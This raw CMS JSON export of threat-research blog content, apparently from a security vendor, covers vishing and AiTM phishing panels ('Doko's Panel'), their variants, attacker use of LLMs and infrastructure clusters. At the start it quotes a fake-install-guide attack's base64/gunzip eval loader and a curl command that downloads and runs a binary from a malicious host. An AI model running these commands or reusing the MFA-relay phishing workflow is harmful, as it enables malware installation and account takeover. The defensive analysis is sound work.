stage:",{"data":10638,"content":10639,"nodeType":879},{},[10640],{"data":10641,"marks":10642,"value":10644,"nodeType":883},{},[10643],{"type":10563},"#!\u002Fbin\u002Fzsh",{"data":10646,"content":10647,"nodeType":879},{},[10648],{"data":10649,"marks":10650,"value":10652,"nodeType":883},{},[10651],{"type":10563},"mkgrc9=$(base64 -D \u003C\u003C'PAYLOAD_END' | gunzip",{"data":10654,"content":10655,"nodeType":879},{},[10656],{"data":10657,"marks":10658,"value":10660,"nodeType":883},{},[10659],{"type":10563},"H4sIAKgRpGkC\u002F13LPQqAMAxA4b2niAhdpGYVbxPbSoT+0UYonl5HdXwfvHHA7Uh4NVb2rAFMBpRYkH0ovgKLlLYiNqoU8y7Es80R05LwLI7Eg9bQSaSCsZ\u002FzccsxO5j631+pbrYTnkSAAAAA",{"data":10662,"content":10663,"nodeType":879},{},[10664],{"data":10665,"marks":10666,"value":10668,"nodeType":883},{},[10667],{"type":10563},"PAYLOAD_END",{"data":10670,"content":10671,"nodeType":879},{},[10672],{"data":10673,"marks":10674,"value":10676,"nodeType":883},{},[10675],{"type":10563},")",{"data":10678,"content":10679,"nodeType":879},{},[10680],{"data":10681,"marks":10682,"value":10684,"nodeType":883},{},[10683],{"type":10563},"eval \"$mkgrc9\"",{"data":10686,"content":10687,"nodeType":879},{},[10688,10691],{"data":10689,"marks":10690,"value":5957,"nodeType":883},{},[],{"data":10692,"marks":10693,"value":10695,"nodeType":883},{},[10694],{"type":916},"Binaries:",{"data":10697,"content":10698,"nodeType":879},{},[10699],{"data":10700,"marks":10701,"value":10644,"nodeType":883},{},[10702],{"type":10563},{"data":10704,"content":10705,"nodeType":879},{},[10706],{"data":10707,"marks":10708,"value":10710,"nodeType":883},{},[10709],{"type":10563},"curl -o \u002Ftmp\u002Fhelper https:\u002F\u002Fsaramoftah.com\u002Fn8n\u002Fupdate && xattr -c \u002Ftmp\u002Fhelper && chmod +x \u002Ftmp\u002Fhelper && \u002Ftmp\u002Fhelper","InstallFix: How attackers are weaponizing malvertised install guides  ","Attackers are impersonating popular developer tools like Claude Code to distribute fake install instructions via malicious search engine ads.","2026-03-06T00:00:00.000Z","installfix",{"items":10716},[10717,10719],{"sys":10718,"name":3273},{"id":3272},{"sys":10720,"name":343},{"id":3276},{"items":10722},[10723],{"fullName":10724,"firstName":10725,"jobTitle":10726,"profilePicture":10727},"Jacques Louw","Jacques","Co-founder \u002F CRO",{"url":10728},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F39m8bektV23lnCRcEq0G8h\u002F2a08f6276a50744f1a4b499b273f6bb2\u002FPush_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-21.jpg",{"__typename":1967,"sys":10730,"content":10732,"title":12628,"synopsis":12629,"hashTags":59,"publishedDate":12630,"slug":12631,"tagsCollection":12632,"authorsCollection":12638},{"id":10731},"2tz0zEJCarJBkceOYk4zVg",{"json":10733},{"data":10734,"content":10735,"nodeType":875},{},[10736,10743,10772,10783,10790,10796,10808,10814,10817,10825,10832,10895,10902,10908,10911,10919,10926,10932,10940,10947,11073,11079,11085,11091,11097,11105,11112,11119,11182,11189,11195,11201,11209,11216,11223,11231,11238,11271,11278,11284,11291,11339,11346,11354,11361,11367,11374,11381,11387,11394,11427,11434,11440,11443,11451,11458,11465,11472,11477,11484,11491,11497,11504,11510,11517,11523,11530,11537,11540,11548,11564,11571,11590,11833,11840,11871,12106,12113,12120,12321,12328,12513,12516,12524,12531,12538,12550,12553,12560,12577,12594,12601,12604,12612],{"data":10737,"content":10738,"nodeType":879},{},[10739],{"data":10740,"marks":10741,"value":10742,"nodeType":883},{},[],"When Push blocks an attack in the browser, we take the opportunity to do some more digging to see what else we can find. One recent detection led us down the rabbit hole — and right into a criminal phishing panel. ",{"data":10744,"content":10745,"nodeType":879},{},[10746,10750,10756,10760,10768],{"data":10747,"marks":10748,"value":10749,"nodeType":883},{},[],"Real-time operated phishing panels have been used extensively in recent months, in vishing + phishing attacks attributed to first ",{"data":10751,"content":10752,"nodeType":940},{"uri":7639},[10753],{"data":10754,"marks":10755,"value":3504,"nodeType":883},{},[],{"data":10757,"marks":10758,"value":10759,"nodeType":883},{},[],", and more recently the ",{"data":10761,"content":10763,"nodeType":940},{"uri":10762},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-blackfile-extortion-gang-targets-retail-and-hospitality-orgs\u002F",[10764],{"data":10765,"marks":10766,"value":10767,"nodeType":883},{},[],"BlackFile",{"data":10769,"marks":10770,"value":10771,"nodeType":883},{},[]," hacking group, with a significant overlap in techniques and tooling. ",{"data":10773,"content":10774,"nodeType":879},{},[10775,10780],{"data":10776,"marks":10777,"value":10779,"nodeType":883},{},[10778],{"type":916},"We’ve directly accessed active deployments of the operator panels driving these campaigns, observed what happens in real-time when a victim is targeted, and analyzed multiple variants and forks of the tooling. ",{"data":10781,"marks":10782,"value":951,"nodeType":883},{},[],{"data":10784,"content":10785,"nodeType":879},{},[10786],{"data":10787,"marks":10788,"value":10789,"nodeType":883},{},[],"We identified four primary infrastructure clusters, with each deployment having its own panel implementation. While the panels share common heritage, the operators deploying them appear to be separate groups with different infrastructure preferences and operational patterns.",{"data":10791,"content":10795,"nodeType":971},{"target":10792},{"sys":10793},{"id":10794,"type":976,"linkType":977},"5BQOpzjSbobLx8OkvXl6os",[],{"data":10797,"content":10798,"nodeType":879},{},[10799,10803],{"data":10800,"marks":10801,"value":10802,"nodeType":883},{},[],"The existence of these independently branded forks indicates that the tooling has entered a phase of wider distribution — operators who obtained the original panel source are now customizing and reshipping it for their own purposes. As a result, the tooling is now most likely accessible to a broad population of financially motivated threat actors. ",{"data":10804,"marks":10805,"value":10807,"nodeType":883},{},[10806],{"type":916},"In total, we’ve identified over 400 domains linked to the attacks, giving an indication of the scale. ",{"data":10809,"content":10813,"nodeType":971},{"target":10810},{"sys":10811},{"id":10812,"type":976,"linkType":977},"2Z1LUdYXVONWO9nnJTkWsJ",[],{"data":10815,"content":10816,"nodeType":905},{},[],{"data":10818,"content":10819,"nodeType":909},{},[10820],{"data":10821,"marks":10822,"value":10824,"nodeType":883},{},[10823],{"type":916},"Background",{"data":10826,"content":10827,"nodeType":879},{},[10828],{"data":10829,"marks":10830,"value":10831,"nodeType":883},{},[],"Since at least August 2025, attackers have been running hybrid social engineering campaigns targeting hundreds of organizations across financial services, technology, cryptocurrency, healthcare, hospitality, and private aviation. ",{"data":10833,"content":10834,"nodeType":1531},{},[10835,10850,10865,10880],{"data":10836,"content":10837,"nodeType":1535},{},[10838],{"data":10839,"content":10840,"nodeType":879},{},[10841,10846],{"data":10842,"marks":10843,"value":10845,"nodeType":883},{},[10844],{"type":916},"August 2025: ",{"data":10847,"marks":10848,"value":10849,"nodeType":883},{},[],"Tooling made available, used in crypto-focused attacks",{"data":10851,"content":10852,"nodeType":1535},{},[10853],{"data":10854,"content":10855,"nodeType":879},{},[10856,10861],{"data":10857,"marks":10858,"value":10860,"nodeType":883},{},[10859],{"type":916},"November 2025:",{"data":10862,"marks":10863,"value":10864,"nodeType":883},{},[]," Major attacks on enterprise identity platforms begin",{"data":10866,"content":10867,"nodeType":1535},{},[10868],{"data":10869,"content":10870,"nodeType":879},{},[10871,10876],{"data":10872,"marks":10873,"value":10875,"nodeType":883},{},[10874],{"type":916},"January 2026: ",{"data":10877,"marks":10878,"value":10879,"nodeType":883},{},[],"Public breaches reported",{"data":10881,"content":10882,"nodeType":1535},{},[10883],{"data":10884,"content":10885,"nodeType":879},{},[10886,10891],{"data":10887,"marks":10888,"value":10890,"nodeType":883},{},[10889],{"type":916},"March 2026: ",{"data":10892,"marks":10893,"value":10894,"nodeType":883},{},[],"Activity spikes again",{"data":10896,"content":10897,"nodeType":879},{},[10898],{"data":10899,"marks":10900,"value":10901,"nodeType":883},{},[],"The attacks combine voice phishing with MFA-bypassing adversary-in-the-middle (AiTM) phishing mechanisms that allow the attacker to steal authenticated sessions for target applications — typically enterprise identity providers and cryptocurrency exchanges. Once an identity provider account is compromised, the attackers pivot across connected SaaS platforms — SharePoint, Salesforce, DocuSign, Slack — exfiltrates data, and attempts to extort the victim organization. ",{"data":10903,"content":10907,"nodeType":971},{"target":10904},{"sys":10905},{"id":10906,"type":976,"linkType":977},"2X2YXMpozrbRQhegk7yF1k",[],{"data":10909,"content":10910,"nodeType":905},{},[],{"data":10912,"content":10913,"nodeType":909},{},[10914],{"data":10915,"marks":10916,"value":10918,"nodeType":883},{},[10917],{"type":916},"Inside the panels: what Push found",{"data":10920,"content":10921,"nodeType":879},{},[10922],{"data":10923,"marks":10924,"value":10925,"nodeType":883},{},[],"Push detected an active Okta phishing site with TTPs aligned to the tooling used by SLH and affiliated groups. Through analysis of the phishing infrastructure, we gained direct access to Doko’s Panel and variants, and were able to observe how these attacks unfold from the operator's perspective — including real victim submission logs from the current week confirming ongoing active operations.",{"data":10927,"content":10931,"nodeType":971},{"target":10928},{"sys":10929},{"id":10930,"type":976,"linkType":977},"5ND0etPs5xN7ejz24l71jy",[],{"data":10933,"content":10934,"nodeType":1036},{},[10935],{"data":10936,"marks":10937,"value":10939,"nodeType":883},{},[10938],{"type":916},"How the attack works",{"data":10941,"content":10942,"nodeType":879},{},[10943],{"data":10944,"marks":10945,"value":10946,"nodeType":883},{},[],"The general sequence of steps is the same across the panels:",{"data":10948,"content":10949,"nodeType":1531},{},[10950,10965,10980,11004,11019,11034,11058],{"data":10951,"content":10952,"nodeType":1535},{},[10953],{"data":10954,"content":10955,"nodeType":879},{},[10956,10961],{"data":10957,"marks":10958,"value":10960,"nodeType":883},{},[10959],{"type":916},"The operator calls the target",{"data":10962,"marks":10963,"value":10964,"nodeType":883},{},[]," spoofing the organization's IT helpdesk number, often referencing real employee names or internal ticket numbers to establish trust. The target is directed to a phishing domain — usually following a combosquatting pattern like my\u003Ctarget>internal[.]com or \u003Ctarget>sso[.]com — under the pretext of a mandatory security update, passkey enrollment, or support ticket resolution. ",{"data":10966,"content":10967,"nodeType":1535},{},[10968],{"data":10969,"content":10970,"nodeType":879},{},[10971,10976],{"data":10972,"marks":10973,"value":10975,"nodeType":883},{},[10974],{"type":916},"The victim lands on the phishing domain",{"data":10977,"marks":10978,"value":10979,"nodeType":883},{},[]," and is presented with a loading spinner — the anti-bot gate that prevents unauthorized access to the phishing pages.",{"data":10981,"content":10982,"nodeType":1535},{},[10983],{"data":10984,"content":10985,"nodeType":879},{},[10986,10991,10995,11000],{"data":10987,"marks":10988,"value":10990,"nodeType":883},{},[10989],{"type":916},"The operator accepts the visitor",{"data":10992,"marks":10993,"value":10994,"nodeType":883},{},[]," from the admin panel and ",{"data":10996,"marks":10997,"value":10999,"nodeType":883},{},[10998],{"type":916},"the victim is redirected",{"data":11001,"marks":11002,"value":11003,"nodeType":883},{},[]," to the cloned login page (e.g. Google, Microsoft, Okta).",{"data":11005,"content":11006,"nodeType":1535},{},[11007],{"data":11008,"content":11009,"nodeType":879},{},[11010,11015],{"data":11011,"marks":11012,"value":11014,"nodeType":883},{},[11013],{"type":916},"The victim enters their email address and password",{"data":11016,"marks":11017,"value":11018,"nodeType":883},{},[],", which is forwarded to the operator's Telegram channel. The victim sees a processing spinner on the branded login form.",{"data":11020,"content":11021,"nodeType":1535},{},[11022],{"data":11023,"content":11024,"nodeType":879},{},[11025,11030],{"data":11026,"marks":11027,"value":11029,"nodeType":883},{},[11028],{"type":916},"The operator relays the credentials",{"data":11031,"marks":11032,"value":11033,"nodeType":883},{},[]," to the real identity provider. If they're valid, the attack proceeds. If they're invalid, the operator can redirect the victim back to the credential entry pages. Assuming MFA is required, the operator issues a redirect to an appropriate MFA capture page — \"Submit SMS OTP,\" \"Submit Gauth OTP,\" or \"Approve [XX] Prompt,\" depending on what the legitimate IdP is presenting.",{"data":11035,"content":11036,"nodeType":1535},{},[11037],{"data":11038,"content":11039,"nodeType":879},{},[11040,11045,11049,11054],{"data":11041,"marks":11042,"value":11044,"nodeType":883},{},[11043],{"type":916},"The victim submits their OTP or approves the push notification ",{"data":11046,"marks":11047,"value":11048,"nodeType":883},{},[],"and",{"data":11050,"marks":11051,"value":11053,"nodeType":883},{},[11052],{"type":916}," the operator relays the OTP",{"data":11055,"marks":11056,"value":11057,"nodeType":883},{},[]," in their own login session, completes authentication, and captures the session. ",{"data":11059,"content":11060,"nodeType":1535},{},[11061],{"data":11062,"content":11063,"nodeType":879},{},[11064,11069],{"data":11065,"marks":11066,"value":11068,"nodeType":883},{},[11067],{"type":916},"The victim is redirected to a benign page",{"data":11070,"marks":11071,"value":11072,"nodeType":883},{},[]," (e.g., Google Drive) or to a support ticket closure screen displaying a fabricated ticket number.",{"data":11074,"content":11078,"nodeType":971},{"target":11075},{"sys":11076},{"id":11077,"type":976,"linkType":977},"1o0wm3EOd7zSl5MddsNxgL",[],{"data":11080,"content":11084,"nodeType":971},{"target":11081},{"sys":11082},{"id":11083,"type":976,"linkType":977},"7w7SQEn3aITpcgXLMThhbS",[],{"data":11086,"content":11087,"nodeType":879},{},[11088],{"data":11089,"marks":11090,"value":21,"nodeType":883},{},[],{"data":11092,"content":11096,"nodeType":971},{"target":11093},{"sys":11094},{"id":11095,"type":976,"linkType":977},"PJJabY1ZfoCfl8XQ6PMj2",[],{"data":11098,"content":11099,"nodeType":1036},{},[11100],{"data":11101,"marks":11102,"value":11104,"nodeType":883},{},[11103],{"type":916},"Doko’s Panel",{"data":11106,"content":11107,"nodeType":879},{},[11108],{"data":11109,"marks":11110,"value":11111,"nodeType":883},{},[],"Let’s take a closer look at the panels themselves. We'll start with the default version of Doko's Panel since it’s the most established. It provides a multi-functional framework targeting users of Google, Microsoft Entra, Okta, and popular cryptocurrency exchanges including Abra, Coinbase, Gemini, and Kraken. Its core functionality resides in a client-side JavaScript file (client.js) that establishes the real-time feedback loop between the victim's browser and the operator's C2.",{"data":11113,"content":11114,"nodeType":879},{},[11115],{"data":11116,"marks":11117,"value":11118,"nodeType":883},{},[],"The technical indicators that characterize Doko's Panel in its standard form include:",{"data":11120,"content":11121,"nodeType":1531},{},[11122,11137,11152,11167],{"data":11123,"content":11124,"nodeType":1535},{},[11125],{"data":11126,"content":11127,"nodeType":879},{},[11128,11133],{"data":11129,"marks":11130,"value":11132,"nodeType":883},{},[11131],{"type":916},"client.js",{"data":11134,"marks":11135,"value":11136,"nodeType":883},{},[]," containing a pingServer() function that sends a JSON POST request to \u002Fbackend.php every second with the structure { action: 'ping', token, window_id, page, os, browser }. If the response contains a redirect key, the victim's browser navigates to that path. ",{"data":11138,"content":11139,"nodeType":1535},{},[11140],{"data":11141,"content":11142,"nodeType":879},{},[11143,11148],{"data":11144,"marks":11145,"value":11147,"nodeType":883},{},[11146],{"type":916},"sendTelegramMessage()",{"data":11149,"marks":11150,"value":11151,"nodeType":883},{},[]," (aliased to sendtg()), a function for relaying real-time credential submissions and session updates to the operator's Telegram channel.",{"data":11153,"content":11154,"nodeType":1535},{},[11155],{"data":11156,"content":11157,"nodeType":879},{},[11158,11163],{"data":11159,"marks":11160,"value":11162,"nodeType":883},{},[11161],{"type":916},"backend.php",{"data":11164,"marks":11165,"value":11166,"nodeType":883},{},[]," as the primary server-side handler for both victim ping actions and admin panel operations (retrieving connected victim information, sending redirect instructions).",{"data":11168,"content":11169,"nodeType":1535},{},[11170],{"data":11171,"content":11172,"nodeType":879},{},[11173,11178],{"data":11174,"marks":11175,"value":11177,"nodeType":883},{},[11176],{"type":916},"j.php",{"data":11179,"marks":11180,"value":11181,"nodeType":883},{},[]," as the endpoint for sending Telegram messages, relaying captured credentials and session logs.",{"data":11183,"content":11184,"nodeType":879},{},[11185],{"data":11186,"marks":11187,"value":11188,"nodeType":883},{},[],"Push found that deployments of Doko's Panel had minimal security by default — anyone was able to view the admin panel and manage visitors' connections without authentication.",{"data":11190,"content":11194,"nodeType":971},{"target":11191},{"sys":11192},{"id":11193,"type":976,"linkType":977},"3glwGSGHdCpf3DLqNmQqN8",[],{"data":11196,"content":11200,"nodeType":971},{"target":11197},{"sys":11198},{"id":11199,"type":976,"linkType":977},"20ymWIXMkmJlw7XYb93c9o",[],{"data":11202,"content":11203,"nodeType":1036},{},[11204],{"data":11205,"marks":11206,"value":11208,"nodeType":883},{},[11207],{"type":916},"Panel proliferation and remixes",{"data":11210,"content":11211,"nodeType":879},{},[11212],{"data":11213,"marks":11214,"value":11215,"nodeType":883},{},[],"Access to Doko's Panel has clearly proliferated beyond its original developers, resulting in remixes and variants being distributed across the ecosystem. Push identified a variant titled \"Lord Mensius's Panel\" targeting Koinly (a cryptocurrency tax platform), and another titled \"$$$\" using a template impersonating the Australian Tax Office, also targeting cryptocurrency tax filing. ",{"data":11217,"content":11218,"nodeType":879},{},[11219],{"data":11220,"marks":11221,"value":11222,"nodeType":883},{},[],"The existence of these independently branded forks indicates that the tooling has entered a phase of wider distribution — operators who obtained the original panel source are now customizing and reshipping it for their own purposes. As a result, the tooling is now accessible to a broad population of financially motivated threat actors. ",{"data":11224,"content":11225,"nodeType":1036},{},[11226],{"data":11227,"marks":11228,"value":11230,"nodeType":883},{},[11229],{"type":916},"heartbeat\u002Fcheck_redirect variant",{"data":11232,"content":11233,"nodeType":879},{},[11234],{"data":11235,"marks":11236,"value":11237,"nodeType":883},{},[],"In addition to Doko’s Panel and its forks, the site initially detected by Push used a modified variant of Doko's Panel with a different C2 protocol. Rather than the standard ping action, this variant sent two types of regular requests from client.js to the backend:",{"data":11239,"content":11240,"nodeType":1531},{},[11241,11256],{"data":11242,"content":11243,"nodeType":1535},{},[11244],{"data":11245,"content":11246,"nodeType":879},{},[11247,11252],{"data":11248,"marks":11249,"value":11251,"nodeType":883},{},[11250],{"type":916},"Heartbeat",{"data":11253,"marks":11254,"value":11255,"nodeType":883},{},[]," — POST to backend.php with action=heartbeat along with page, token, and window_id.",{"data":11257,"content":11258,"nodeType":1535},{},[11259],{"data":11260,"content":11261,"nodeType":879},{},[11262,11267],{"data":11263,"marks":11264,"value":11266,"nodeType":883},{},[11265],{"type":916},"Check Redirect",{"data":11268,"marks":11269,"value":11270,"nodeType":883},{},[]," — GET to backend.php with parameters action=check_redirect along with token and window_id.",{"data":11272,"content":11273,"nodeType":879},{},[11274],{"data":11275,"marks":11276,"value":11277,"nodeType":883},{},[],"A redirect instruction in response to either request causes the victim's browser to navigate to the specified page. The variant compounds this with a separate inline script embedded in the landing gate HTML — in addition to client.js — that schedules its own sendHeartbeat() and checkRedirect() functions on regular intervals. ",{"data":11279,"content":11283,"nodeType":971},{"target":11280},{"sys":11281},{"id":11282,"type":976,"linkType":977},"6zRc9ublZvEQCxcWtMBSnF",[],{"data":11285,"content":11286,"nodeType":879},{},[11287],{"data":11288,"marks":11289,"value":11290,"nodeType":883},{},[],"Additional technical differentiators for this variant include:",{"data":11292,"content":11293,"nodeType":1531},{},[11294,11309,11324],{"data":11295,"content":11296,"nodeType":1535},{},[11297],{"data":11298,"content":11299,"nodeType":879},{},[11300,11305],{"data":11301,"marks":11302,"value":11304,"nodeType":883},{},[11303],{"type":916},"UUID generation",{"data":11306,"marks":11307,"value":11308,"nodeType":883},{},[]," using Math.random() to replace x in the template xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx, rather than the original Doko's Panel method of constructing a template from [1e7]+-1e3+-4e3+-8e3+-1e11 and replacing [018].",{"data":11310,"content":11311,"nodeType":1535},{},[11312],{"data":11313,"content":11314,"nodeType":879},{},[11315,11320],{"data":11316,"marks":11317,"value":11319,"nodeType":883},{},[11318],{"type":916},"No central Telegram sending function",{"data":11321,"marks":11322,"value":11323,"nodeType":883},{},[],", though j.php still exists and is called from inline scripts on individual phishing pages.",{"data":11325,"content":11326,"nodeType":1535},{},[11327],{"data":11328,"content":11329,"nodeType":879},{},[11330,11335],{"data":11331,"marks":11332,"value":11334,"nodeType":883},{},[11333],{"type":916},"No use of FNV-1a",{"data":11336,"marks":11337,"value":11338,"nodeType":883},{},[]," to hash-generate the window ID.",{"data":11340,"content":11341,"nodeType":879},{},[11342],{"data":11343,"marks":11344,"value":11345,"nodeType":883},{},[],"Push also found sub-variants hosting Okta phishing pages with additional modifications: a minified client.js script, and a renamed backend endpoint (api_FyekIDWY.php replacing backend.php).",{"data":11347,"content":11348,"nodeType":1036},{},[11349],{"data":11350,"marks":11351,"value":11353,"nodeType":883},{},[11352],{"type":916},"Revamped admin panel",{"data":11355,"content":11356,"nodeType":879},{},[11357],{"data":11358,"marks":11359,"value":11360,"nodeType":883},{},[],"Push also found examples of a significantly revamped admin panel, including a version from April 2026 specifically targeting Microsoft as an enterprise identity provider. ",{"data":11362,"content":11366,"nodeType":971},{"target":11363},{"sys":11364},{"id":11365,"type":976,"linkType":977},"3ufb4cotpg0f7yoIQJnND0",[],{"data":11368,"content":11369,"nodeType":879},{},[11370],{"data":11371,"marks":11372,"value":11373,"nodeType":883},{},[],"This panel featured a more sophisticated operator interface with an updated look, quick action buttons, and sound notifications.",{"data":11375,"content":11376,"nodeType":879},{},[11377],{"data":11378,"marks":11379,"value":11380,"nodeType":883},{},[],"In addition to the standard compromise flow for acquiring email, password, and OTP, this panel provided operator actions for sending Microsoft Teams call instructions to the victim — a Meeting ID and Passcode rendered on a branded page. This capability likely enables further interaction through a channel that supports screensharing, extending the attacker's reach beyond credential theft into live session manipulation. It also has the potential to make the scenario more believable for the victim.",{"data":11382,"content":11386,"nodeType":971},{"target":11383},{"sys":11384},{"id":11385,"type":976,"linkType":977},"4pg65d1SvTJA3xm6AsxZBp",[],{"data":11388,"content":11389,"nodeType":879},{},[11390],{"data":11391,"marks":11392,"value":11393,"nodeType":883},{},[],"Other capabilities were referenced in the panel's source code but did not appear active in the observed deployment:",{"data":11395,"content":11396,"nodeType":1531},{},[11397,11412],{"data":11398,"content":11399,"nodeType":1535},{},[11400],{"data":11401,"content":11402,"nodeType":879},{},[11403,11408],{"data":11404,"marks":11405,"value":11407,"nodeType":883},{},[11406],{"type":916},"Additional MFA approval pages",{"data":11409,"marks":11410,"value":11411,"nodeType":883},{},[]," for Duo and Okta, with the operator providing a code to display to the victim.",{"data":11413,"content":11414,"nodeType":1535},{},[11415],{"data":11416,"content":11417,"nodeType":879},{},[11418,11423],{"data":11419,"marks":11420,"value":11422,"nodeType":883},{},[11421],{"type":916},"A code execution prompt",{"data":11424,"marks":11425,"value":11426,"nodeType":883},{},[]," to instruct the victim to run a command — the placeholder example being mshta to execute a remote HTA file, suggesting a potential bridge from identity compromise into malware delivery.",{"data":11428,"content":11429,"nodeType":879},{},[11430],{"data":11431,"marks":11432,"value":11433,"nodeType":883},{},[],"The admin panel also included settings for restricting access to specific geographic locations and device types, allowing operators to refine their campaign targeting and also avoid detection from unusual devices (often an indicator that the visitor is not a real human and is actually a security tool or bot).",{"data":11435,"content":11439,"nodeType":971},{"target":11436},{"sys":11437},{"id":11438,"type":976,"linkType":977},"1hebGtxbkyuejWXczwx5n6",[],{"data":11441,"content":11442,"nodeType":905},{},[],{"data":11444,"content":11445,"nodeType":909},{},[11446],{"data":11447,"marks":11448,"value":11450,"nodeType":883},{},[11449],{"type":916},"LLM-generated tells: vibe-coded phishing infrastructure",{"data":11452,"content":11453,"nodeType":879},{},[11454],{"data":11455,"marks":11456,"value":11457,"nodeType":883},{},[],"Evidence of extensive LLM use is extremely prevalent in attacks detected by Push, from LLM-generated phishing kits and tools to vibe-coded cloned pages. Attackers have also been observed leveraging AI–assisted capabilities in SaaS platforms to automate and scale-up their campaigns from an infrastructure and operations perspective. ",{"data":11459,"content":11460,"nodeType":879},{},[11461],{"data":11462,"marks":11463,"value":11464,"nodeType":883},{},[],"The ‘heartbeat’ variant in particular has significant tells of heavy use of LLMs to modify the phishing panel for the operator’s needs. The fact that these are so blatant increases the belief that these tools are being vibe-coded by relatively inexperienced developers with limited regard for operational security.",{"data":11466,"content":11467,"nodeType":879},{},[11468],{"data":11469,"marks":11470,"value":11471,"nodeType":883},{},[],"Some versions of client.js begin with verbose header comments that no human developer would write:",{"data":11473,"content":11476,"nodeType":971},{"target":11474},{"sys":11475},{"id":2966,"type":976,"linkType":977},[],{"data":11478,"content":11479,"nodeType":879},{},[11480],{"data":11481,"marks":11482,"value":11483,"nodeType":883},{},[],"The \"NOTES FOR NEXT SESSION\" header is particularly telling — it's a pattern generated by LLMs that maintain context between chat sessions, not a convention any human developer would adopt in production code, let alone in a phishing kit where operational security should discourage self-documenting infrastructure.",{"data":11485,"content":11486,"nodeType":879},{},[11487],{"data":11488,"marks":11489,"value":11490,"nodeType":883},{},[],"The admin panel HTML contains similarly over-documented opening comments:",{"data":11492,"content":11496,"nodeType":971},{"target":11493},{"sys":11494},{"id":11495,"type":976,"linkType":977},"60snRhz0RIsvLI6OU9RDOk",[],{"data":11498,"content":11499,"nodeType":879},{},[11500],{"data":11501,"marks":11502,"value":11503,"nodeType":883},{},[],"One of the Okta cloned login pages observed by Push contained the following comments suggesting the use of an LLM to create the clone:",{"data":11505,"content":11509,"nodeType":971},{"target":11506},{"sys":11507},{"id":11508,"type":976,"linkType":977},"1WCd5LQ6cfPf1IsNAhPSIT",[],{"data":11511,"content":11512,"nodeType":879},{},[11513],{"data":11514,"marks":11515,"value":11516,"nodeType":883},{},[],"The cloned Microsoft login pages displayed previously contain terser comments, but still typical of useless comments that are included by an LLM rather than a human author, especially a malware\u002Fphishing author:",{"data":11518,"content":11522,"nodeType":971},{"target":11519},{"sys":11520},{"id":11521,"type":976,"linkType":977},"6WN59mkiscNmAt8dmOR81c",[],{"data":11524,"content":11525,"nodeType":879},{},[11526],{"data":11527,"marks":11528,"value":11529,"nodeType":883},{},[],"The broken duplication in the heartbeat variant — where an inline script and client.js independently schedule the same backend requests using slightly different data formats — is consistent with an operator pasting requirements into an LLM and accepting the output without understanding the existing codebase well enough to recognize the redundancy.",{"data":11531,"content":11532,"nodeType":879},{},[11533],{"data":11534,"marks":11535,"value":11536,"nodeType":883},{},[],"Clearly, the barrier to entry for building (or forking) and operating a real-time vishing phishing panel is lower than the effectiveness of the tooling might suggest.",{"data":11538,"content":11539,"nodeType":905},{},[],{"data":11541,"content":11542,"nodeType":909},{},[11543],{"data":11544,"marks":11545,"value":11547,"nodeType":883},{},[11546],{"type":916},"Infrastructure clustering and attribution",{"data":11549,"content":11550,"nodeType":879},{},[11551,11555,11560],{"data":11552,"marks":11553,"value":11554,"nodeType":883},{},[],"Through analysis of phishing domains, hosting infrastructure, and technical indicators in the panel source code, ",{"data":11556,"marks":11557,"value":11559,"nodeType":883},{},[11558],{"type":916},"we’re highlighting four distinct infrastructure clusters associated with this tooling. ",{"data":11561,"marks":11562,"value":11563,"nodeType":883},{},[],"While the panels share common heritage, the operators deploying them appear to be separate groups with different infrastructure preferences and operational patterns.",{"data":11565,"content":11566,"nodeType":1036},{},[11567],{"data":11568,"marks":11569,"value":11570,"nodeType":883},{},[],"Cluster A",{"data":11572,"content":11573,"nodeType":879},{},[11574,11578,11586],{"data":11575,"marks":11576,"value":11577,"nodeType":883},{},[],"The indicators for Cluster A overlap with ",{"data":11579,"content":11580,"nodeType":940},{"uri":2100},[11581],{"data":11582,"marks":11583,"value":11585,"nodeType":883},{},[11584],{"type":948},"Mandiant’s reporting on UNC6661",{"data":11587,"marks":11588,"value":11589,"nodeType":883},{},[],". Mandiant also attributes the extortion activity following UNC6661 intrusions to UNC6240, aka ShinyHunters.",{"data":11591,"content":11592,"nodeType":8845},{},[11593,11617,11646,11669,11720,11764,11787,11810],{"data":11594,"content":11595,"nodeType":8752},{},[11596,11607],{"data":11597,"content":11598,"nodeType":8766},{},[11599],{"data":11600,"content":11601,"nodeType":879},{},[11602],{"data":11603,"marks":11604,"value":11606,"nodeType":883},{},[11605],{"type":916},"Tool",{"data":11608,"content":11609,"nodeType":8766},{},[11610],{"data":11611,"content":11612,"nodeType":879},{},[11613],{"data":11614,"marks":11615,"value":11104,"nodeType":883},{},[11616],{"type":916},{"data":11618,"content":11619,"nodeType":8752},{},[11620,11629],{"data":11621,"content":11622,"nodeType":8766},{},[11623],{"data":11624,"content":11625,"nodeType":879},{},[11626],{"data":11627,"marks":11628,"value":11132,"nodeType":883},{},[],{"data":11630,"content":11631,"nodeType":8766},{},[11632,11639],{"data":11633,"content":11634,"nodeType":879},{},[11635],{"data":11636,"marks":11637,"value":11638,"nodeType":883},{},[],"8a01bcb70ec1c101a163c9cb8e074781c1322096f7ae01789f02252854def44c",{"data":11640,"content":11641,"nodeType":879},{},[11642],{"data":11643,"marks":11644,"value":11645,"nodeType":883},{},[],"f574b6e6b3a968cda5f51bec2c090d8eb095fbcfc383314f94bc15676a0d6692",{"data":11647,"content":11648,"nodeType":8752},{},[11649,11659],{"data":11650,"content":11651,"nodeType":8766},{},[11652],{"data":11653,"content":11654,"nodeType":879},{},[11655],{"data":11656,"marks":11657,"value":11658,"nodeType":883},{},[],"Timeframe",{"data":11660,"content":11661,"nodeType":8766},{},[11662],{"data":11663,"content":11664,"nodeType":879},{},[11665],{"data":11666,"marks":11667,"value":11668,"nodeType":883},{},[],"November 2025 - present (April 2026)",{"data":11670,"content":11671,"nodeType":8752},{},[11672,11682],{"data":11673,"content":11674,"nodeType":8766},{},[11675],{"data":11676,"content":11677,"nodeType":879},{},[11678],{"data":11679,"marks":11680,"value":11681,"nodeType":883},{},[],"Domain 